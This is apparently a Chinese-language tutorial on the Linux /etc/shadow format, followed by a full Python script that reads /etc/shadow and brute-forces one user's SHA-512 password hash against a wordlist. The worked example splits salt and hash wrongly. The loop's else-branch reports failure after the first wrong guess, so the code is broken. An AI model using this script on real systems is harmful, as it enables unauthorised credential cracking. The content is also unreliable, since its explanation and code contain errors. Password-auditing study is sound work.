1.必备知识
1.1Linux用户密码存放
路径:/etc/shadow
格式:以“:”为分割号
账号名称:密码(已经经过编码,*就是没有密码):最近更改密码日期:密码不可改动的天数:密码需要改动的天数:密码需要改动期限前的警告天数:密码过期宽限天数:账号失效日期:保留
1.2密码格式
$X$salt$encode
X:使用的哈希算法,1是MD5,5是SHA-256,6是SHA-512
salt:盐值,用来给密码加密的
encode:hash值,是由密码和盐值加密后得到的
举个例子:
$6$4n5EM.O0fTM0m7KG$L/rp8NyPBpFH5zoCefKMHlFhuCUGCttmSGt.jaUmbZOmEWHS.yp/y.WtaMS.5nFMAORrlCBjc39J0nXuqk9AD1
使用SHA-512哈希算法加密,盐值为4n5EM.O0fTM0m7KG$L,hash值为rp8NyPBpFH5zoCefKMHlFhuCUGCttmSGt.jaUmbZOmEWHS.yp/y.WtaMS.5nFMAORrlCBjc39J0nXuqk9AD1
1.3Linux下python的crypt()函数
导入加密库:import crypt
格式:crypt.crypt("密码","盐值")
2.思路
3.完整代码
#!/usr/bin/env python3
import crypt
#读入shadow文件,并且拿出加密的密码
def get_user(txtfile):
with open(txtfile,"rt") as f:
data = f.readlines()
for line in data:
user = line.split(":")[0]
password_hx = line.split(":")[1]
if not (user == "lyq"):
continue
else:
print("要爆破的用户:%s"%user)
salt = password_hx.split("$")[2]
passwd = password_hx
return(salt,passwd)
#取密码字典文件
def dict_passwd(txtfile):
with open(txtfile,"rt") as f:
data = f.readlines()
pwlist = []
for line in data:
pwlist.append(line.rstrip("\n"))
return(pwlist)
#爆破过程
def boom(pwlist,salt,passwd):
salt = "$6$" + salt
for password in pwlist:
cryptword = crypt.crypt(password,salt)
if cryptword == passwd:
print("密码为:",password)
return
else:
print("没有找到密码")
return
if __name__ == "__main__":
file1 = "/root/桌面/password.txt"
file2 = "/etc/shadow"
pwlist = dict_passwd(file1)
salt,passwd = get_user(file2)
boom(pwlist,salt,passwd)
运行结果: